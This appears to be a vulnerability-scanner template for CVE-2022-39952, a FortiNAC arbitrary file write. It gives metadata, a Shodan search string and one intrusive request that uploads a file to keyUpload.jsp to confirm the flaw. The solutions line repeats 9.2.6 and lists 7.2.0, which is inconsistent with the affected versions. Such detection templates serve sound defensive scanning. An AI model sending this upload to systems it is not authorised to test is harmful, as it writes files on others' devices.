id: CVE-2022-39952

info:
  name: Fortinet FortiNAC - Arbitrary File Write
  author: dwisiswant0
  severity: critical
  verified: true
  description: |
    Fortinet FortiNAC is susceptible to arbitrary file write. An external control of the file name or path can allow an attacker to execute unauthorized code or commands via specifically crafted HTTP request, thus making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations. Affected versions are 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7.
    SHODAN: title:"FortiNAC"
  reference:
    - https://fortiguard.com/psirt/FG-IR-22-300
    - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
    - https://github.com/horizon3ai/CVE-2022-39952
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39952
  solutions: Upgrade to 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above.
  tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive
  created: 2023/06/23

set:
  rboundary: randomLowercase(8)
rules:
  r0:
    request:
      method: POST
      path: /configWizard/keyUpload.jsp
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"key\"; filename=\"key\"\r\n\
        \r\n\
        xxx\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.body.bcontains(b"yams.jsp.portal.SuccessfulUpload")
expression: r0()